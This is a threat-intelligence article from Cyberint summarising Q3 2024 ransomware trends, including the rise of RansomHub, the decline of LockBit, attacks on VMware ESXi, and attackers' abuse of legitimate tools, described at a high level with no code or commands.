Trends in Ransomware Attacks in Q3, 2024

In the latest Q3 Ransomware Report from our team at Cyberint – a Check Point Software company and a leading voice in external cyber-risk management – we’ve placed particular emphasis on comparing the most recent quarter, Q3 2024, to the previous one, Q2 2024, when rates of ransomware incidents reached an all-time high. While Q3 saw a slight decrease of 5.5% with 1209 cases (down from 1277 in the prior quarter) the numbers are still notably higher than Q1 2024 and the preceding years.

Here are some key trends and themes as revealed in our report.

A Family Affair

One striking trend is that the top 10 ransomware groups were responsible for just 58.3% of all attacks, pointing to the ongoing rise of a growing number of active black hat groups. This also reflects the declining dominance of such infamous groups as Conti and LockBit, which previously accounted for a broad majority of attacks.

For the first time since 2022, LockBit was no longer the most prolific ransomware group across the quarter. A group called RansomHub has overtaken that dubious title, responsible for 16.1% of Q3 ransomware cases – with a total of 195 victims. LockBit fell to third place with 85 successful attacks, its lowest number in a year-and-a-half.

Regardless of which groups are on top, with the number of active ransomware groups at an all-time high, businesses naturally face an increased risk of attacks. Indeed, the reinvigorated competition between different ransomware groups has fuelled increasingly frequent breaches. These competing gangs are vying for targets with greater fervor and intensity than ever before, leaving little room for error on the part of enterprise cybersecurity teams.

As this proliferating class of ransomware groups continues to scour the web for their next victims, even minor errors can quickly lead to major security incidents.

A Legal Response

Despite the shifting landscape and growth of new major players, increased intervention from governments and law enforcement is helping keep some major ransomware groups at bay. However, while this pressure has notably weakened some key players and will continue to impinge upon experienced gangs, it has also left openings for smaller criminal groups to rise in the ranks. A more diversified landscape with creative new players could yet become even more threatening than one dominated by a few big names.

This is not to discredit the effectiveness of legal crackdowns. These actions have succeeded in creating a less conducive environment for many ransomware groups, signaling that their dominance may be less sustainable than before.

Trends to Watch

In recent years, ransomware groups have increasingly been targeting Linux-based systems and VMware ESXi servers, recognizing them as valuable targets within corporate infrastructures. These systems often host critical virtual machines (VMs) that, if compromised, can quickly lead to more widespread disruption.

Play Ransomware, for instance, has developed a Linux variant to specifically attack VMware ESXi servers, as these servers are widely used in enterprise environments. Since early 2023, VMware has been a major target of ransomware campaigns, exploiting a vulnerability that had been known for over two years. While newer versions have patched the flaw, older, unpatched systems remain exposed to this critical vulnerability, which can be detected and exploited almost completely through automation.

In a similar vein, Cicada3301 Ransomware has also been launching attacks on VMware ESXi servers, while BlackByte has adapted their tactics by targeting vulnerabilities in VMware ESXi to launch attacks that exploit authentication bypass techniques, allowing it to remotely encrypt virtual machines.

This trend is likely a reflection of businesses’ growing reliance on Linux systems to host critical infrastructure. The heightened focus on virtualization environments is also driven by the potential to impact large-scale operations with just one attack, as compromising ESXi servers can lead to the encryption of a plethora of virtualized resources in one fell swoop.

Other notable trends include customized malware and the exploitation of legitimate tools for nefarious purposes.

For example, BlackBasta has adopted custom malware that is more evasive and designed to bypass modern security detection mechanisms, while RansomHub is leveraging legitimate tools like Kaspersky’s TDSSKiller – a free virus removal tool – to disable endpoint detection and response (EDR) software. This allows RansomHub to operate undetected in compromised environments using tools that are less likely to be monitored for misuse.

Legitimate cloud-based tools are also being used for data theft. Take BianLian and Rhysida, both of which were caught pilfering data from victim networks and using Microsoft’s Azure Storage Explorer and AzCopy tools – legitimate cloud-based infrastructure – to store the stolen information.

Implications for the Future

The pace of ransomware attacks shows no signs of slowing.

Despite shifting trends and increased pressure from authorities, cybercriminals are ultimately financially motivated, and ransomware attacks continue to be lucrative. As these gangs become more successful and well-funded, their exploitative capabilities become increasingly sophisticated and more difficult to predict or prevent.

Not only must businesses keep up their guard regarding traditional threat vectors – e.g., phishing attacks, stolen credentials, or exploited vulnerabilities within internet-facing assets – but they must brace for newfound creativity and sophistication from increasingly agile ransomware groups as well.

Accordingly, businesses must adopt a security posture that is more strategic, comprehensive, and up to date than ever before. Staying aware of the ransomware trends is the first step towards doing so.

About the Author

Adi Bleih is Cybersecurity Researcher with 7 years of experience in threat intelligence, incident response fields, and a strong understanding of the threat landscape, intelligence and cyberattack techniques, network security and mitigation strategies.